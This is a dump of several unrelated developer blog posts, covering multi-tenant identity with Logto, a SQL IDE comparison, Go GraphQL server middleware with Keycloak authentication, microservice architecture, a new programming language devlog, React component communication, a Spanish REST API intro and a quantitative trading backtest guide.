Now, here's the catch: Without incorporating “tenant” context, such as a tenant ID, to restrict access to resources, relying solely on authentication and authorization won't prevent a user with the right role from accessing another tenant's resources.
This is where tenant isolation comes into play. It uses tenant-specific identifiers to establish boundaries, much like walls, doors, and locks, ensuring a clear separation between tenants.
# Identity in multi-tenancy apps
We discussed tenant isolation, but what about identities? How do you decide if your identities should be “isolated” or not?
There's often confusion around the concept of "identity isolation." It could refer to situations where one real-world user has two identities in people’s general understanding.
1. Both identities can exist within a single identity system. For instance, Sarah might have a personal email registered alongside a corporate email connected through single sign-on (SSO).
2. Users maintain two distinct identities within separate identity systems, representing entirely separate products. These products are completely unrelated to each other.
At times, these scenarios are referred to as "Identity isolated." Yet, this label might not assist in making a decision.
Rather than determining if you require "identity isolation," consider whether you or a segment of your business or product need to maintain separate identity systems. This answer can guide your Identity and Access Management (IAM) system design. For a brief response concerning a multi-tenant app,
> In most cases, in multi-tenant apps, identities are shared while each tenant's resources are isolated.
In multi-tenant applications, identities, unlike tenant-specific resources and data, are shared among multiple tenants. Picture yourself as the building administrator; you wouldn't want to maintain two separate name sheets to manage your tenants' identities.
When aiming for tenant isolation, you might have observed the recurring emphasis on the term "organization," often regarded as a best practice for building multi-tenant applications.
By employing the notion of "organization," you can achieve tenant isolation in your multi-tenant application while maintaining a unified identity system. This allows multiple "organizations" to coexist, independently, but share tenant-agnostic resources within the application. Similar to residents living in a building, each organization utilizes the application without concern for their neighbors, as the "organization" provides the necessary separation in the form of walls, hallways, doors, and locks. They share the overall building infrastructure, interior design system, and various tangible or intangible components.
# Introducing Logto's “Organization” feature
Logto's "Organization" feature is specifically crafted to meet the tenant isolation requirements necessary for building a SaaS product, aligning with industry standards and best practices.
In the future, we'll delve deeper into the "Organization" feature and how Logto facilitates the implementation of best practices for building a multi-tenant application. Stay tuned!
{% cta https://logto.io/?ref=dev %} Try Logto Cloud for free {% endcta %}
| palomino |
1,878,635 | Top SQL IDEs in 2024 | In the ever-evolving world of data engineering, having the right tools at your disposal is crucial... | 0 | 2024-06-06T02:08:25 | https://dev.to/concerate/top-sql-ides-in-2024-14bj | In the ever-evolving world of data engineering, having the right tools at your disposal is crucial for success.
One essential tool for data professionals is a powerful and reliable SQL Integrated Development Environment (IDE).
An SQL IDE allows you to create, modify, and manage your databases, streamlining your workflow and increasing your overall efficiency.
To help you make an informed decision, we have compiled a list of the top 10 SQL IDEs in 2024, taking into account their features, pros and cons.
Whether you are a seasoned data engineer or just starting, this comprehensive guide will help you find the perfect SQL IDE to fit your needs.
**1. SQLynx**
**Pros:**
Intelligent code completion and suggestions: Using AI technology to provide advanced code completion, intelligent suggestions, and automatic error detection, significantly improving the efficiency of writing and debugging SQL queries.
Cross-platform and mobile access: Supporting access across multiple platforms (including Windows, macOS, Linux) to ensure users can efficiently manage databases from anywhere.
Robust security measures: Supporting both client and web-based management, providing enhanced encryption, multi-factor authentication, and strict access controls to protect sensitive data from unauthorized access and network threats.
**Cons:**
Learning curve: The product is relatively new and has web-based features, which may require some time to adapt and learn.
Security management: Introducing a significant amount of security measures such as authentication, authorization, logging, and auditing, which can increase complexity.
**2. Navicat**
**Pros:**
Multiple database support: Supports a variety of databases such as MySQL, PostgreSQL, SQLite, Oracle, MariaDB, providing strong adaptability.
User-friendly interface: Intuitive user interface design, easy to use for both beginners and professionals.
Data synchronization and backup: Offers powerful data synchronization, backup, and restore functions to ensure data safety and consistency.
**Cons:**
Cost: Navicat is a paid tool, which may be costly for individual users and small teams.
Performance requirements: Rich functionality may lead to higher system resource demands, especially when dealing with large databases.
Learning curve: Utilizing advanced features may require a certain learning and adaptation period.
**3. MySQL Workbench**
**Pros:**
Graphical User Interface (GUI): Provides an intuitive graphical interface, simplifying database design and management.
Database design: Supports database model design and reverse engineering, facilitating the management of complex database structures.
Query execution and debugging: Built-in query execution, debugging, and optimization features that help improve development efficiency.
**Cons:**
Performance issues: There may be performance bottlenecks when dealing with large databases.
Compatibility: Primarily focused on MySQL databases, with limited support for other databases.
**4. SQL Server Management Studio (SSMS)**
**Pros:**
Powerful features: Provides comprehensive database management, development, and debugging tools.
High integration: Closely integrated with Microsoft SQL Server, supporting a wide range of SQL Server functionalities.
Automation tasks: Supports SQL Agent for easy automation of management and maintenance tasks.
**Cons:**
Resource consumption: High system resource requirements, which may have a certain impact on performance.
Windows platform only: Limited to the Windows operating system, weak cross-platform support.
**5. pgAdmin**
**Pros:**
Open-source and free: Open-source software, free to use, with active community support.
Versatile: Comprehensive management support for PostgreSQL, including query execution, database design, and maintenance.
Cross-platform: Supports Windows, macOS, and Linux with good cross-platform compatibility.
**Cons:**
Performance issues: May encounter performance problems when dealing with very large databases.
User interface: The user interface is somewhat complex, requiring some learning time for new users.
**Conclusion:**
The choice of SQL tools depends on specific requirements, the type of database used, and budget constraints. Each tool has its unique pros and cons, and users should select the most suitable tool based on their work environment and needs. SQLynx and Navicat, as modern SQL editors, are worth considering choices due to their powerful features and multi-platform support. | concerate | |
1,878,629 | Bringing It All Together: Integrating GraphQL with Gin in Go | In this phase of our journey, we delve into the realm of middleware integration with gin and the... | 23,111 | 2024-06-06T02:05:29 | https://dev.to/mikeyglitz/bringing-it-all-together-integrating-graphql-with-gin-in-go-49b9 | go, api, tutorial, webdev | In this phase of our journey, we delve into the realm of middleware integration with gin and the implementation of authentication middleware using gocloak. Building upon the groundwork laid in previous sections, we now unify our efforts by integrating middleware seamlessly into our GraphQL server. With gin, a powerful HTTP web framework for Go, we enhance our server's capabilities by incorporating middleware functions to preprocess requests. Leveraging gocloak, a Go module for interfacing with Keycloak, we secure our server with authentication middleware. This pivotal stage marks the convergence of all preceding elements, culminating in the creation of the server run function, which orchestrates the execution of our GraphQL API server. Let's explore how these components harmonize to elevate our server's functionality and security.
### Implementing Authentication Middleware with Keycloak and Gocloak
The final middleware we need to add to our server is authentication. In this example, we'll use [Keycloak](https://www.keycloak.org) as our identity provider. To interface with Keycloak in Go, we'll use the [gocloak](https://github.com/Nerzal/gocloak) module. By leveraging gocloak, we can perform authentication against Keycloak using Gin middleware.
To create the middleware, we begin by specifying the header that we want to inspect from the request. Keycloak leverages the OpenID Connect protocol, so we expect the `Authorization` header to begin with the word "Bearer," followed by a space, and then the full token string. Below, we define the constant `"Bearer "` for this purpose:
```go
const headerPrefix = "Bearer "
```
Next, we need to verify the token. To achieve this, we create a function that accepts a Gorm database pointer (`*gorm.DB`) and an HTTP request pointer (`*http.Request`). This function will extract the Authorization header from the request, validate the token using Keycloak, and return a user if a match is found in the database. If the calls do not complete successfully, the function will return an error.
```go
func ValidateToken(db *gorm.DB, req *http.Request) (*model.User, error) {
authToken := req.Header.Get("Authorization")
authToken = strings.TrimPrefix(authToken, headerPrefix) // Strip the "Auth " from the bearer token
keycloak := config.Config.Auth
// Make call to keycloak authenticating the token
client := gocloak.NewClient(keycloak.Endpoint)
// Add certificate verification if a certificate path is set
if len(keycloak.CertificatePath) > 0 {
log.Infof("Reading certificate from %s...", keycloak.CertificatePath)
cert, err := os.ReadFile(keycloak.CertificatePath)
if err != nil {
log.Errorf("[identity.cert] Unable to read certificate => %v", err)
return nil, err
}
certPool := x509.NewCertPool()
if ok := certPool.AppendCertsFromPEM(cert); !ok {
log.Errorf("[identity.cert] Unable to add cert to pool => %v", err)
return nil, err
}
restyClient := client.RestyClient()
restyClient.SetTLSClientConfig(&tls.Config{RootCAs: certPool})
log.Info("Imported certificate to keycloak client")
}
res, err := client.RetrospectToken(req.Context(), authToken, keycloak.ClientID, keycloak.ClientSecret, keycloak.RealmName)
if err != nil {
log.Errorf("unable to validate access token => %v", err)
return nil, err
}
log.Debugf("[auth] Access Token => %v", *res)
if !*res.Active {
err = errors.New("session is not active")
log.Errorf("session is not active => %v", err)
return nil, err
}
// fetch userinfo and query the database for the user
info, err := client.GetUserInfo(req.Context(), authToken, keycloak.RealmName)
if err != nil {
log.Errorf("unable to fetch user info => %v", err)
return nil, err
}
// add the user to the database if there is no current entry for the user
var user model.User
if err = db.FirstOrCreate(&user, model.User{
Username: *info.PreferredUsername,
Name: fmt.Sprintf("%s %s", *info.GivenName, *info.FamilyName),
}).Error; err != nil {
log.Errorf("unable to save user to database => %v", err)
return nil, err
}
log.Debug(user)
return &user, nil
}
```
The `AuthenticationMiddleware` function is designed to integrate authentication into a Gin web server. This function takes a Gorm database pointer (`*gorm.DB`) as an argument and returns a Gin handler function. Inside the handler, the middleware calls the `ValidateToken` function, passing it the database pointer and the current HTTP request. If the token validation fails, an error is logged, and the request is aborted with an HTTP status of 403 (Forbidden). If the token is successfully validated, the user information is added to the request context, allowing downstream handlers to access it. Finally, the middleware calls `c.Next()` to pass control to the next handler in the chain.
```go
func AuthenticationMiddleware(db *gorm.DB) gin.HandlerFunc {
return func(c *gin.Context) {
user, err := ValidateToken(db, c.Request)
if err != nil {
log.Errorf("unable to authenticate token => %v", err)
err = c.AbortWithError(http.StatusForbidden, err)
log.Debug(err)
return
}
c.Request = c.Request.WithContext(context.WithValue(c.Request.Context(), userKey, user))
c.Next()
}
}
```
Finally, the `ForUser` function is designed to retrieve the authenticated user from the request context within a Gin web server. This function takes a context (`ctx`) as an argument and attempts to extract the user information stored in the context using a predefined key (`userKey`). It utilizes the `ctx.Value` method to access the value associated with `userKey` and performs a type assertion to convert it to a `*model.User`. If the user information is not found or the type assertion fails, the function returns `nil`. This utility function allows other parts of the application to conveniently access the authenticated user from the context, facilitating user-specific operations and data handling.
```go
func ForUser(ctx context.Context) *model.User {
user, _ := ctx.Value(userKey).(*model.User)
return user
}
```
### Finalizing Server Setup: The Run Function
With all the middleware components established throughout the series, it's time to bring everything together and finalize the server setup. The `Run` function acts as the glue, orchestrating the integration of various middleware components and starting the Gin server. This function typically initializes the Gin router, applies the middleware layers in the desired order, and defines the routes or endpoints for handling incoming requests. It encapsulates the server configuration and provides a unified entry point for launching the web server. By consolidating the middleware setup and server initialization logic into a single function, we ensure consistency, maintainability, and ease of management for the entire server application.
The `Run` function sets up the server configuration, defines routes, applies middleware, and starts the server. It initializes the server with Gin's default middleware, sets up endpoints for actuator, GraphQL playground, and GraphQL itself. The middleware stack includes services, data loader middleware, and authentication middleware to handle various aspects of request processing and security. Finally, it starts the server to listen on the configured host and port, logging the endpoint for reference.
```go
func Run(db *gorm.DB) {
config := config.Config
endpoint := fmt.Sprintf("%s:%d", config.Service.Host, config.Service.Port)
r := gin.Default()
r.GET("/actuator/*endpoint", handlers.ActuatorHandler(db))
r.Use(middleware.Services(db, index.IndexConnection))
r.Use(middleware.DataloaderMiddleware())
r.GET(config.Service.PlaygroundPath, handlers.PlaygroundHandler())
r.Use(gin.Recovery())
secured := r.Group(config.Service.Path)
secured.Use(middleware.AuthenticationMiddleware(db))
secured.POST("/", handlers.GraphqlHandler())
log.Infof("Running @ http://%s", endpoint)
log.Fatal(r.Run(endpoint))
}
```
The `Run` function serves as the centerpiece of our server logic, orchestrating the integration of GraphQL with Gin in Go. Encapsulated within the `pkg/server` package, it represents the culmination of our efforts across various modules and middleware layers. At the bottom of our application entrypoint, housed in `cmd/main.go`, we invoke `server.Run` to kickstart the server and bring our GraphQL-powered application to life.
### Finishing Touches: Revisiting GraphQL
This `GraphqlHandler` function serves as the entry point for GraphQL requests in our server. It initializes a `config` struct with the resolver functions provided by our `graph` package. Additionally, it configures directives, such as validation, to be used during query execution. Finally, it creates a handler using `handler.NewDefaultServer`, passing in the executable schema generated by gqlgen based on our schema and resolvers. This handler is then returned as a Gin middleware function, allowing it to process GraphQL requests coming to our server.
```go
func GraphqlHandler() gin.HandlerFunc {
config := generated.Config{Resolvers: &graph.Resolver{}}
// Add directives
config.Directives.Validate = directives.Validate
h := handler.NewDefaultServer(generated.NewExecutableSchema(config))
return func(c *gin.Context) { h.ServeHTTP(c.Writer, c.Request) }
}
```
As we put the finishing touches on our GraphQL server, let's revisit one of our resolvers to demonstrate how we can seamlessly integrate middleware into our GraphQL operations. Middleware plays a crucial role in intercepting and augmenting requests before they reach our resolvers, allowing us to perform additional tasks such as authentication, logging, or data manipulation. By integrating middleware into our resolver functions, we can enhance the functionality and security of our GraphQL API without cluttering our resolver logic. Let's dive into the details of how middleware can be seamlessly incorporated into our GraphQL server architecture.
In this Go code snippet, we revisit the User resolver previously implemented in our GraphQL server. This resolver function, named Pantries, is responsible for fetching a list of pantries associated with a particular user. Within the function, we access the services layer through the context, leveraging a middleware function to retrieve the necessary service. Once obtained, we call the FetchPantriesByAuthor method from the PantryService to retrieve the pantries associated with the user. The function accepts optional parameters such as order, pagination details (startAt and size), and returns a PantryList along with any potential errors encountered during the process. This resolver exemplifies how middleware can seamlessly integrate with resolver functions to enhance the functionality of our GraphQL server.
```go
func (r *userResolver) Pantries(ctx context.Context, obj *model.User, order *model.SearchOrder, startAt *int, size *int) (*model.PantryList, error) {
services := middleware.ForServices(ctx)
return services.PantryService.FetchPantriesByAuthor(order, &obj.ID, startAt, size)
}
```
### Conclusion: Bringing it All Together
In conclusion, this article series has provided a comprehensive guide to building a robust GraphQL API server in Go. We began by setting up gqlgen for GraphQL integration, customized it to fit Go project conventions, and defined our GraphQL schema with resolvers. We abstracted our data model using services, integrated them using middleware, and implemented schema-level validation. Additionally, we optimized data retrieval with dataloaders, ensuring efficient query execution. Finally, we tied everything together with authentication middleware and a run function encapsulated in the server package. By following these steps, we've laid a solid foundation for creating powerful GraphQL APIs in Go, ready to handle various use cases and scale with ease.
# References
- Keycloak golang webservices - https://mikebolshakov.medium.com/keycloak-with-go-web-services-why-not-f806c0bc820a
- Opinionated graphql server with go - https://dev.to/cmelgarejo/creating-an-opinionated-graphql-server-with-go-part-1-3g3l
| mikeyglitz |
1,878,633 | Best Practice: Micro Service Architecture | Cloudforet, a series of LinuxFounation Open Source projects is one of the best practice for Micro... | 0 | 2024-06-06T02:04:43 | https://dev.to/choonho/best-practice-micro-service-architecture-1p3h | cloud, msa, development, kubernetes | > Cloudforet, a series of LinuxFounation Open Source projects is one of the best practice for Micro Service Architecture and Cloud Native.
# Micro Service Architecture
Cloudforet adopts a microservice architecture to provide a scalable and flexible platform. The microservice architecture is a design pattern that structures an application as a collection of loosely coupled services. Each service is self-contained and implements a single business capability. The services communicate with each other through well-defined APIs. This architecture allows each service to be developed, deployed, and scaled independently.

The frontend is a service provided for web users, featuring components such as console and console-api that communicate directly with the web browser. The core logic is structured as independent microservices and operates based on gRPC to ensure high-performance and reliable communication.
Each core logic can be extended by plugin services. Every plugins are developed and deployed independently, and they can be added, removed or upgraded without affecting the core logic.
# API-Driven design
API-Driven design in microservice architecture is a pattern where APIs (Application Programming Interfaces) are the primary way that services interact and communicate with each other. This approach emphasizes the design of robust, well-defined, and consistent APIs that serve as the contracts between microservices. Here’s a detailed explanation of the API-Driven design pattern:
### gRPC as the Communication Protocol
gRPC is a high-performance, open-source, universal RPC (Remote Procedure Call) framework that is widely used in microservice architectures. It uses HTTP/2 as the transport protocol and Protocol Buffers (protobuf) as the interface definition language. gRPC provides features such as bidirectional streaming, flow control, and authentication, making it an ideal choice for building efficient and reliable microservices.
### Loose Coupling
API-Driven design promotes loose coupling between microservices by defining clear and well-documented APIs. Each microservice exposes a set of APIs that define how other services can interact with it. This allows services to evolve independently without affecting each other, making it easier to develop, deploy, and maintain microservices.
### Version control
Cloudforet APIs support two types of versioning, core and plugin version. Core version is for communication between micro services for frontend. plugin version of internal communication in a single micro services for implementing API.
> API Documentation https://cloudforet.io/api-doc/
> Protobuf API Specification https://github.com/cloudforet-io/api
# Service-Resource-Verb Pattern
API-Driven design can be effectively explained using the concepts of service, resource, and verb. Here’s how these concepts apply to microservices:

### Service
A service in microservice architecture represents a specific business functionality. Each service is a standalone unit that encapsulates a distinct functionality, making it independently deployable, scalable, and maintainable. Services communicate with each other over a network, using lightweight protocols gRPC.
* Example: in the Cloudforet, individual services are identity, repository, or inventory.
* identity service: manages user authentication and authorization.
* repository service: manages the metadata for plugins and their versions.
* inventory service: manages the resources and their states.
### Resource
A resource represents the entities or objects that the services manage. Resources are typically data entities that are created, read, updated, or deleted (CRUD operations) by the services.
* Example: in the identity Service, resources include Domain, User, and Workspace.
* Domain: represents a seperated organization or customer.
* User: represents a user account.
* Workspace: represents a logically isolated group contains resources.
### Verb
A verb represents the actions or operations that can be performed on resources. These are typically the gRPC methods (get, create, delete, update, list, etc.) in a service. Verbs define what kind of interaction is taking place with a resource.
* Example: in the User resource, verbs include create, get, update, delete, and list.
* create: creates a new user.
* get: retrieves the user information.
* update: updates the user information.
* delete: deletes the user.
* list: lists all users.
# Reference
* Cloudforet https://cloudforet.io
* Cloudforet github https://github.com/cloudforet-io
| choonho |
1,878,634 | Kneader Compounding Machines: Meeting the Challenges of Polymer Mixing | Kneader Compounding Devices: The Risk-free as well as Effective Method towards Blend... | 0 | 2024-06-06T02:02:16 | https://dev.to/ronald_woodgo_ba03f686524/kneader-compounding-machines-meeting-the-challenges-of-polymer-mixing-364c | design, product |
Kneader Compounding Devices: The Risk-free as well as Effective Method towards Blend Polymers
Kneader Compounding Devices are actually exactly just what our team contact a huge assistant on the planet of plastic production. They are actually important devices that are actually utilized towards blend with each other various polymers towards produce brand-brand new as well as enhanced compounding machine products. Kneader Compounding Devices are actually extremely effective devices that could be utilized for a great deal of various points, such as assisting towards produce brand-brand new as well as interesting playthings, enhancing the high top premium of vehicle components, as well as producing brand-brand new kinds of product packing products
Benefits of Kneader Compounding Devices
Kneader Compounding Devices have actually lots of benefits over conventional blending techniques. They are actually quicker as well as much a lot extra effective compared to various other mixers, as well as they are actually likewise much more secure towards utilize. They have actually a big capability as well as can easily manage big quantities of products easily. They can easily likewise blend products of various viscosities, which is essential when producing brand-brand new products. Another benefit of Kneader Compounding Devices is actually that they can easily blend products at an accurate temperature level. This implies that the temperature level will certainly correspond throughout the whole blending procedure, which is essential for creating top quality products
Development in Kneader Compounding Devices
Kneader Compounding Devices have actually enhanced significantly throughout the years. They are actually currently developed towards offer higher effectiveness, security, as well as simplicity of utilization. One development in Kneader Compounding Devices is actually the combination of progressed sensing units as well as manages that can easily screen as well as change the blending procedure in real-time. These sensing units can easily spot modifications in temperature level, stress, as well as thickness, as well as change the blending procedure appropriately. This guarantees that the blending procedure is actually constant, as well as the end extruder filament product is actually of the finest
Security Factors to consider for Kneader Compounding Devices
Kneader Compounding Devices are actually extremely risk-free towards utilize, because of their lots of security functions. They have actually a great deal of security protectors that safeguard the driver coming from relocating components throughout procedure. Certainly there certainly are actually likewise emergency situation quit switches that can easily quit the device instantly in the event of an emergency situation. Furthermore, Kneader Compounding Devices have actually alarm systems as well as cautioning illuminations that notify the driver towards any type of prospective problems throughout procedure
Utilizing Kneader Compounding Devices
Kneader Compounding Devices are actually extremely user-friendly. The driver just includes the polymers that require to become combined, establishes the temperature level, and after that begins the device. The device looks after the remainder. The driver can easily change the blending procedure if required through altering the temperature level, blending rate, or even blending opportunity. When the blending procedure is actually finish, the driver can easily eliminate the combined product coming from the device for additional handling
High top premium of Kneader Compounding Devices
Kneader Compounding Devices are actually extremely top quality devices that are actually developed towards final. They are actually created coming from top quality products as well as are actually developed towards endure hefty utilize. They are actually likewise developed to become extremely simple towards preserve, along with easy cleansing treatments that could be performed in a couple of mins. Furthermore, Kneader Compounding Devices are actually supported through outstanding customer support, which implies that any type of problems that occur could be rapidly dealt with through a well-informed sustain group
Requests of Kneader Compounding Devices
Kneader Compounding Devices have actually a wide variety of requests in the production market. They are actually typically utilized in the manufacturing of plastics, rubber, adhesives, as well as various other products. Some typical requests consist of the manufacturing of vehicle components, playthings, meals product packing products, as well as clinical materials. Kneader Compounding Devices are actually likewise utilized in the r & d of brand-brand new paper lamination machine products, as they can easily blend with each other various polymers towards produce brand-brand new as well as interesting products
| ronald_woodgo_ba03f686524 |
1,878,596 | So I tried Odoo for the first time | From web developer's viewpoint, I'm going to setup Odoo for the first time. It is going to installed... | 0 | 2024-06-06T01:57:53 | https://dev.to/yuiltripathee/so-i-tried-odoo-for-the-first-time-2o96 | webdev, erp, beginners, odoo | From web developer's viewpoint, I'm going to setup Odoo for the first time. It is going to installed on my local computer (Ubuntu 22.04) and the installation will be from community edition.
## Prerequisites
- Git, Python (3.10+), Pip and basics (IDEs and stuff)
- PostgreSQL database (can be community edition)
## Initial steps
This is coming from Odoo's official documentation.
1. Fork the GitHub [repo](https://github.com/odoo/odoo) for the community edition.
2. Create a new postgres user. Odoo does not accept `postgres` default user.
```sh
sudo -u postgres createuser -d -R -S $USER
createdb $USER
```
## Running Odoo for the first time
The two new databases created on PostgreSQL are: `$USER` whatever your username is and the other one called `mydb`. Run this command after you clone the Odoo repo and `cd` inside.
```sh
python3 odoo-bin --addons-path=addons -d mydb
```
After the server has started (the INFO log odoo.modules.loading: Modules loaded. is printed), open [http://localhost:8069](http://localhost:8069) in a web browser and log into the Odoo database with the base administrator account: use admin as the email and, again, admin as the password.
## Check the database schema
I ran the ERD for database tool in pgAdmin to inspect the database design for the Odoo community base platform.
From the start there are 114 tables linked in a mesh. So, I chose to dig into the database structure a bit further.
## Findings
1. Odoo's database model is quite mature as of Version 17 and incorporable to wide contextual range.
2. The database structure is monolith. Therefore, decoupling into possible micro-services would be a good prospect as some modules requires scaling different than the other.
3. You can refer to [Server Framework 101 guide](https://www.odoo.com/documentation/17.0/developer/tutorials/server_framework_101.html) in order to develop your own modules.
## References
- [Odoo on-premise setup from source guide](https://www.odoo.com/documentation/17.0/administration/on_premise/source.html) | yuiltripathee |
1,877,536 | Buffing A 50 Year Old Programming Language | Hello, everyone! Today, I'm excited to take you on a journey through the fascinating world of... | 0 | 2024-06-06T01:57:11 | https://dev.to/mantlecore/buffing-a-50-year-old-programming-language-58la | showdev, opensource, programming, cpp | Hello, everyone! Today, I'm excited to take you on a journey through the fascinating world of programming languages and compilers. We'll be exploring a new language I'm developing called "Mantle" (or simply "M"). But before we get into the nitty-gritty, let's discuss the architecture of Mantle and what I aim to achieve with it.
## The Inspiration Behind Mantle
I've been immersed in programming with C and C++ for a considerable time, primarily working on 3D computer graphics using Vulkan. My initial exploration into programming began with C++, which I grew to love for its high-level constructs and powerful memory management capabilities. However, I often found C++ to be overly complex. I gradually developed a preference for C. C's simplicity, with its minimal abstraction over assembly, provided a clearer understanding of how the hardware operates.
Yet, I frequently found myself torn between C and C++ when starting new projects. Each language has its strengths and weaknesses, and I wanted to create one that blends the best aspects of both. Thus, Mantle was born.
## The Design Philosophy of Mantle
Today I will just briefly show you an overview of what I think Mantle can look like.
### Organizing Code: Namespaces
One of the challenges in C is the lack of a robust mechanism for code organization, leading to messy codebases. Mantle addresses this by incorporating namespaces from C++, allowing for better code grouping and organization.

### Defining Interfaces: Protocols
Mantle introduces the concept of “protocols". Protocols define requirements, such as functions and variables, that must be implemented by adopting types. This brings us to the “prototype” keyword, which acts as a placeholder for types specified when the protocol is adopted. This design encourages composition over inheritance, promoting flexible and modular code.

### Creating Classes: Blueprints
In Mantle, “blueprints” are akin to classes in other languages. Blueprints support public and private members, constructors, and destructors for managing resources. Unlike C++, Mantle distinguishes between structs and blueprints. Structs are used for grouping related variables, while blueprints facilitate object-oriented programming.

### Extending Functionality: Extensions
To extend a blueprint's functionality for specific parts of the code, Mantle uses the “extension” keyword. This allows functions to be associated with a blueprint only within a particular file, providing modular and context-specific extensions.


### Eliminating Redundancy: Generics
Generics are a powerful feature in Mantle, enabling the definition of functions, blueprints, structs, and variables with types specified later. This reduces code repetition and enhances flexibility.

###Powerful Preprocessing: Macros
In Mantle, macros are defined with the “macro” keyword, leveraging generics for powerful code inclusion before compilation. This concept builds on the preprocessor directives of C and C++.

### Core Concepts: Pointers and Optionals
Mantle incorporates pointers and optionals as core language features. If you have ever programmed in Swift or have used the `std::optional<T>` in C++ you might be quite familiar with this. Optionals represent values that may or may not be present, providing a type-safe way to handle absent values. Pointers, on the other hand, store memory addresses, enabling direct memory manipulation.
## Building Mantle: The Lexical Analyzer
With an understanding of Mantle's design, let's dive into building the language, starting with Lexical Analysis, or lexing. Lexing transforms raw source code into tokens, which are the fundamental syntax elements.
### Defining Token Types
We'll begin by defining the types of tokens Mantle will recognize:
- **Keywords:** Data types, control flow constructs, data structures, and reserved words.
- **Operators:** Arithmetic, relational, pointer, bitwise, and assignment operators.
- **Punctuators:** Parentheses, curly brackets, square brackets, commas, etc.
- **Identifiers:** Names given to variables, functions, and types.
- **End of File:** Marks the end of the source file.
These tokens will evolve as the language matures and its functionality is refined.
### The Lexing Process
Next, we'll write a lexer that processes a file, identifies tokens, and stores information for error handling, such as the token's position in the source file. Once identified, tokens are categorized and queued for further processing.

### Testing the Lexer
To test our lexer, we'll hardcode a function that processes tokens and generates assembly code. For example, writing a "return" statement followed by a value, passing this file through our lexer, and generating assembly code will validate our lexer's functionality.

Here are some more extreme tests.


## Conclusion
We've successfully laid the groundwork for Mantle and developed a basic lexer. There's much more to explore and build, but I hope you've enjoyed this initial exploration into the process. If you found this interesting, feel free to connect with me and to share any suggestions.
You can find the project on my [github](https://github.com/Mantle-Core/Mantle-Language). I also made a [discord server](https://discord.gg/7TEkMmvn).
If you have some feedback/suggestions let me know in the comments! Thanks for joining me on this journey, and I'll see you in the next time!
| mantlecore |
1,878,630 | Inter component communication in React. | In the React ecosystem, building complex applications often involves breaking down the UI into... | 0 | 2024-06-06T01:49:32 | https://dev.to/engineeringexpert/inter-component-communication-in-react-300b | react, javascript, frontend |
In the React ecosystem, building complex applications often involves breaking down the UI into reusable components. However, this modularity raises a crucial question: How do these components effectively communicate and share data?
This article explores the various mechanisms available in React to ensure smooth and efficient communication between your components.
Understanding the Need for Communication
Before diving into the techniques, let's clarify why inter-component communication is essential:
**- Data Sharing:**
Components often need to access and modify data that exists outside their local state.
**- Event Handling:**
User interactions (clicks, form submissions, etc.) might trigger changes that need to be communicated to other components.
**- State Management: **
In larger applications, centralized state management can simplify complex data flows.
`JavaScript
function Parent() {
const handleChildClick = (data) => {
// Do something with data
};
return <Child onClick={handleChildClick} />;
}
function Child({ onClick }) {
return <button onClick={() => onClick("Data from child")}>Click me</button>;
}`
`JavaScript
// Parent component
function Parent() {
const message = "Hello from parent!";
return <Child message={message} />;
}
// Child component
function Child({ message }) {
return <p>{message}</p>;
}`
References: https://www.frontendeng.dev/blog/5-tutorial-how-to-communicate-between-two-components-in-react | engineeringexpert |
1,877,286 | Primera parte: Introducción API Rest | API Rest es tal vez la arquitectura de backend más utilizada en la industria y que parece ser... | 27,616 | 2024-06-06T01:31:41 | https://dev.to/alfredtester/primera-parte-introduccion-api-rest-4109 | testing, api, apitesting | API Rest es tal vez la arquitectura de backend más utilizada en la industria y que parece ser atemporal. Aunque fue creada para resolver un problema, se usa para solucionar casi cualquier problema 😶.
Al ser (volvernos) probadores funcionales, el backend es algo que generalmente desconocemos ya que solo nos piden que nuestro foco esté en lo que ve el usuario, disminuyendo así las combinaciones o escenarios de pruebas posibles a ejecutar ya que algunas casuísticas requieren manipulación de datos a nivel de base de batos (y no tenemos acceso a ellas) o manipulación de las respuestas de los endpoints que son consumidos (ya que desconocemos la manera en como la información consultada es devuelta (retornada) al front).
Como mencioné al principio Rest API es muy utilizado, tan así; que podemos notar su presencia en casi todas las aplicaciones que usamos en nuestro día a día así como las que tenemos que probar (ya sean web, mobile, desktop, iot) por tanto conocer y sobre todo entender con que se come API marca una gran diferencia a la hora de asegurar la calidad de un producto digital.
Luego de esta mediana introducción, ahora si entremos en materia:
**Qué es API Rest?**
Sin entrar en tecnicismos (más adelante si profundizaremos en esto) y de manera muy simple, una API es básicamente un medio que permite crear, consultar, actualizar y/o eliminar información con el sistema que estamos interactuando (interno o externo) sin importar con que lenguaje de programación se encuentra construído.
Visualmente una API Rest es:

La imagen anterior, para mi; es la mejor representación visualmente hablando sobre qué es un API. Es aquel (aquello) al que le hacen una solicitud (orden) y luego que esta es preparada (solicitud procesada) se entrega la preparación al comensal (consumidor).
---
Para no saturar de información, este primer post de la serie es tan solo una introducción, en cada post iremos profundizando hasta tener todo lo necesario para volvernos expertos en API Testing!
| alfredtester |
1,878,626 | How to do quantitative trading backtesting | Summary The significance and importance of backtesting is undoubted. When doing... | 0 | 2024-06-06T01:29:20 | https://dev.to/fmzquant/how-to-do-quantitative-trading-backtesting-3oof | trading, backtest, cryptocurrency, fmzquant | ## Summary
The significance and importance of backtesting is undoubted. When doing quantitative backtesting, the strategy should be placed in the historical environment as real and close as possible. If some details in the historical environment are ignored, the whole quantitative backtesting may be invalid. This article will explain how to do the appropriate quantitative trading backtesting.
Backtesting is equivalent to data playback. By playing back historical K- line data and performing real-market trading rules, such as the Sharpe ratio, maximum retracement rate, annualized rate of return and capital curves. At present, there are many softwares that can do all these, such as "MetaTrader", "MultiCharts" and "IB Trader Workstation", which are all very comprehensive, also there is a open-sourced one called VNPY on github.com, which can be customized flexibly.
The FMZ Quant as a commercial quantitative trading software, comes with the high performance backtest engine, using for-loop (polling) backtest frame, to quantify the calculation faster. And unified backtesting and real-time code, solved the "backtesting easy, but real-market difficult" dilemma.
## FMZ Quant Backtest Interface Introduction
- Step 1
Taking the FMZ Quant “Thermostat” timing strategy as an example, let's open the official website of the FMZ Quant (www.fmz.com). Click dashboard, Strategy, select a strategy, click backtest, and go to the following page:


In the backtest configuration interface, you can customize it according to your actual needs. Such as: set backtest period, K line cycle, data type (simulation level data or real-market level data. In contrast, simulation level data backtesting speed is faster, real-market level data backtesting is more accurate). In addition, you can also set the commission fee for the backtest and the initial funds of the account.
- Step 2
